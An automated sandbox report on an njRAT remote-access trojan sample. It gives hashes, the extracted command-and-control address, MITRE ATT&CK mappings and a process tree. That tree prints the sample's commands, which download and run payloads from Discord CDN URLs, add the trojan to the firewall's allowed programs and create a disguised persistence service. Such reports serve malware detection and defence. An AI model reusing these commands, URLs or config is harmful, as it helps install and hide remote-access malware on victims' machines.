njrat | 534b9bc8809ae37a2beada5b9d868bda1c17c32be812ec3b30de2ad2382014a0

Analysis

max time kernel
152s
max time network
155s
platform
windows7_x64
resource
win7-en-20211104
submitted
27-11-2021 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe
Size

355KB
MD5

42c690607f11ff38887673a9cb86f1c9
SHA1

a7fcd7c5082cb6a8c96997cba1d050d808294fcb
SHA256

534b9bc8809ae37a2beada5b9d868bda1c17c32be812ec3b30de2ad2382014a0
SHA512

71cef63a004765358e8f98328f4b23d209f05cfe653ea8da3d0fe40cfc972e323258ec822185850373fc4d95b3288fbd325f9dd1642a4382101160cb0a87543d

Score

10^/10

njrat 1 evasion persistence suricata trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

4.tcp.ngrok.io:11271

Mutex

4e889e7da72189e24bc725ec5f51224f

Attributes

reg_key
4e889e7da72189e24bc725ec5f51224f
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

extd.exeextd.exeextd.exeJoyLaunch.exeextd.exesetup.exeextd.exegpue.exeserver.exe

pid process

1508 extd.exe
516 extd.exe
108 extd.exe
1684 JoyLaunch.exe
1636 extd.exe
1784 setup.exe
1956 extd.exe
776 gpue.exe
612 server.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1508	extd.exe
516	extd.exe
108	extd.exe
1684	JoyLaunch.exe
1636	extd.exe
1784	setup.exe
1956	extd.exe
776	gpue.exe
612	server.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe	upx

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4e889e7da72189e24bc725ec5f51224f.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4e889e7da72189e24bc725ec5f51224f.exe	server.exe

Loads dropped DLL 7 IoCs

Processes:

setup.exeJoyLaunch.exe

pid process

1784 setup.exe
1784 setup.exe
1784 setup.exe
1784 setup.exe
1784 setup.exe
1784 setup.exe
1684 JoyLaunch.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\4e889e7da72189e24bc725ec5f51224f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\4e889e7da72189e24bc725ec5f51224f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Windows directory 5 IoCs

Processes:

setup.exegpue.execmd.exe

description	ioc	process
File created	C:\Windows\parameters.ini	setup.exe
File created	C:\Windows\proceslist.txt	setup.exe
File created	C:\Windows\gpue.exe	setup.exe
File opened for modification	C:\Windows\parameters.ini	gpue.exe
File created	C:\Windows\gpu_name.txt	cmd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe	nsis_installer_2

Modifies data under HKEY_USERS 1 IoCs

Processes:

WMIC.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs

Processes:

extd.exeextd.exeextd.exeJoyLaunch.exeextd.exesetup.exeextd.exe

pid process

1508 extd.exe
516 extd.exe
108 extd.exe
1684 JoyLaunch.exe
1636 extd.exe
1784 setup.exe
1956 extd.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

pid	process
1508	extd.exe
516	extd.exe
108	extd.exe
1684	JoyLaunch.exe
1636	extd.exe
1784	setup.exe
1956	extd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exegpue.exeserver.exe

pid	process
1784	setup.exe
1784	setup.exe
1784	setup.exe
1784	setup.exe
1784	setup.exe
1784	setup.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
776	gpue.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe
612	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

612 server.exe

pid	process
612	server.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

gpue.exeWMIC.exeserver.exe

description	pid	process
Token: SeDebugPrivilege	776	gpue.exe
Token: SeAssignPrimaryTokenPrivilege	364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	364	WMIC.exe
Token: SeSecurityPrivilege	364	WMIC.exe
Token: SeTakeOwnershipPrivilege	364	WMIC.exe
Token: SeLoadDriverPrivilege	364	WMIC.exe
Token: SeSystemtimePrivilege	364	WMIC.exe
Token: SeBackupPrivilege	364	WMIC.exe
Token: SeRestorePrivilege	364	WMIC.exe
Token: SeShutdownPrivilege	364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	364	WMIC.exe
Token: SeUndockPrivilege	364	WMIC.exe
Token: SeManageVolumePrivilege	364	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	364	WMIC.exe
Token: SeSecurityPrivilege	364	WMIC.exe
Token: SeTakeOwnershipPrivilege	364	WMIC.exe
Token: SeLoadDriverPrivilege	364	WMIC.exe
Token: SeSystemtimePrivilege	364	WMIC.exe
Token: SeBackupPrivilege	364	WMIC.exe
Token: SeRestorePrivilege	364	WMIC.exe
Token: SeShutdownPrivilege	364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	364	WMIC.exe
Token: SeUndockPrivilege	364	WMIC.exe
Token: SeManageVolumePrivilege	364	WMIC.exe
Token: SeDebugPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe
Token: 33	612	server.exe
Token: SeIncBasePriorityPrivilege	612	server.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

gpue.exe

pid process

776 gpue.exe

pid	process
776	gpue.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.execmd.exesetup.execmd.exenet.execmd.execmd.exe

description	pid	process	target process
PID 1704 wrote to memory of 724	1704	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 1704 wrote to memory of 724	1704	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 1704 wrote to memory of 724	1704	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 1704 wrote to memory of 724	1704	534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe	cmd.exe
PID 724 wrote to memory of 1508	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1508	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1508	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1508	724	cmd.exe	extd.exe
PID 724 wrote to memory of 516	724	cmd.exe	extd.exe
PID 724 wrote to memory of 516	724	cmd.exe	extd.exe
PID 724 wrote to memory of 516	724	cmd.exe	extd.exe
PID 724 wrote to memory of 516	724	cmd.exe	extd.exe
PID 724 wrote to memory of 108	724	cmd.exe	extd.exe
PID 724 wrote to memory of 108	724	cmd.exe	extd.exe
PID 724 wrote to memory of 108	724	cmd.exe	extd.exe
PID 724 wrote to memory of 108	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1684	724	cmd.exe	JoyLaunch.exe
PID 724 wrote to memory of 1636	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1636	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1636	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1636	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1784	724	cmd.exe	setup.exe
PID 724 wrote to memory of 1956	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1956	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1956	724	cmd.exe	extd.exe
PID 724 wrote to memory of 1956	724	cmd.exe	extd.exe
PID 1784 wrote to memory of 1888	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1888	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1888	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1888	1784	setup.exe	cmd.exe
PID 1888 wrote to memory of 1780	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 1780	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 1780	1888	cmd.exe	net.exe
PID 1888 wrote to memory of 1780	1888	cmd.exe	net.exe
PID 1780 wrote to memory of 1128	1780	net.exe	net1.exe
PID 1780 wrote to memory of 1128	1780	net.exe	net1.exe
PID 1780 wrote to memory of 1128	1780	net.exe	net1.exe
PID 1780 wrote to memory of 1128	1780	net.exe	net1.exe
PID 1784 wrote to memory of 1168	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1168	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1168	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1168	1784	setup.exe	cmd.exe
PID 1168 wrote to memory of 672	1168	cmd.exe	sc.exe
PID 1168 wrote to memory of 672	1168	cmd.exe	sc.exe
PID 1168 wrote to memory of 672	1168	cmd.exe	sc.exe
PID 1168 wrote to memory of 672	1168	cmd.exe	sc.exe
PID 1784 wrote to memory of 1512	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1512	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1512	1784	setup.exe	cmd.exe
PID 1784 wrote to memory of 1512	1784	setup.exe	cmd.exe
PID 1512 wrote to memory of 896	1512	cmd.exe	sc.exe
PID 1512 wrote to memory of 896	1512	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe
"C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\D3D5.bat C:\Users\Admin\AppData\Local\Temp\534B9BC8809AE37A2BEADA5B9D868BDA1C17C32BE812E.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:724

C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1508

C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:516

C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/877176601429819402/894936762034561024/JoyLaunch.exe" "JoyLaunch.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:108

C:\Users\Admin\AppData\Local\Temp\31831\JoyLaunch.exe
JoyLaunch.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1684

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:612

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
5⤵
PID:1736

C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893540407105949760/893540461770317844/setup.exe" "setup.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1636

C:\Users\Admin\AppData\Local\Temp\31831\setup.exe
setup.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net stop GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\net.exe
net stop GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop GPUService
6⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc delete GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\SysWOW64\sc.exe
Sc delete GPUService
5⤵
PID:672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\sc.exe
Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
5⤵
PID:896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C sc description GPUService ServiceManagerForGPU
4⤵
PID:852

C:\Windows\SysWOW64\sc.exe
sc description GPUService ServiceManagerForGPU
5⤵
PID:940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net start GPUService
4⤵
PID:1384

C:\Windows\SysWOW64\net.exe
net start GPUService
5⤵
PID:1632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start GPUService
6⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1956

C:\Windows\gpue.exe
C:\Windows\gpue.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:776

C:\Windows\SysWOW64\cmd.exe
cmd /c wmic path win32_VideoController get name > C:\Windows\gpu_name.txt
2⤵
- Drops file in Windows directory
PID:572

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:364

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\31831\JoyLaunch.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\31831\JoyLaunch.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe

MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\31831\setup.exe

MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\D3D5.bat

MD5
0001d9273fff93431efaa0182eff96d5

SHA1
19667d004d2a718698d2e6d406bcb0f1b3300789

SHA256
b2211c7fb7cb769d4427088e460dcb1a75f235af4d3f8d97985e0640648d8082

SHA512
47ddffd3a16fc97f3750eb6a779ed0c377c04209b0079d661900732277d3539c4facdcfe7c2e7bab6e7b5904f785ae9e450f3b8aa817b2a9bd22ecf85b570f3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3D3.tmp\D3D4.tmp\extd.exe

MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
5e00f52448cd669e8fd4d67190958c36

SHA1
a1e381b7c55b3bd295e6dd6e896ebf3e0591b3c5

SHA256
da71a2a5cbc68fa09d0c1976d2aefebe867de3fd31805de586ca1491151e79d3

SHA512
117af6f97c06de56ea27b0880b2f4c0b848a1e67ef29b021dae6c065d63c5da89584bffb62ddbde3b3838f9fe2bec3d25f5dbde3141d2988890e971ca93bed55

Download Submit
C:\Windows\gpue.exe

MD5
4f5546a65f13faa1552e34d301b03dfe

SHA1
47d430278d13f8d23d5d865777ca14ebf7bae296

SHA256
e172c632cd031235affc1ae38c1f18674eb069a80bba7c6358551247ed010061

SHA512
f8779f5f9bf5b776142b5d6e821bd2ed4a7618406f153d4d82cfb2ea80c4dd194b1ade72694388ad911ce1a3929f02a4cd62f347febfa15e4931e68f5f1bd5d9

Download Submit
C:\Windows\parameters.ini

MD5
a9e16c8820bc8ea84968c423771c42c1

SHA1
8a384cd91f77bc8c6a4408ea0dd0b0a4e9d6cd54

SHA256
2c78aef611fae9862278a6f5f0677686d2bdf911fa441a39b5f3bc0d028a7bc8

SHA512
71d9e01f34a625d3756580c03d8e520552ea4d68ce78ca3adf69594947014adb4ec0ccbfef1cc64b7f0961726baa69a083829ef87aadf71dd7dba9a65e29f114

Download Submit
C:\Windows\proceslist.txt

MD5
a6ed38248f19079a4503576153d91409

SHA1
0bbc351696d5fd8659f1f18c36195bd192869bc8

SHA256
e26ad6677297f6476356bb6c368c5f933165a16635c4bd6c2aad5e8d6784f5f5

SHA512
f064c6f52fe247cdb801bbcae07d1636dace09f8500460660472cb9918f75e92ebcf89c8b6aa45e7c830839a5aea323c310bf0c93d90f5d77242bb50aa86e31f

Download Submit
\Users\Admin\AppData\Local\Temp\nsdE522.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsdE522.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsdE522.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsdE522.tmp\nsExec.dll

MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

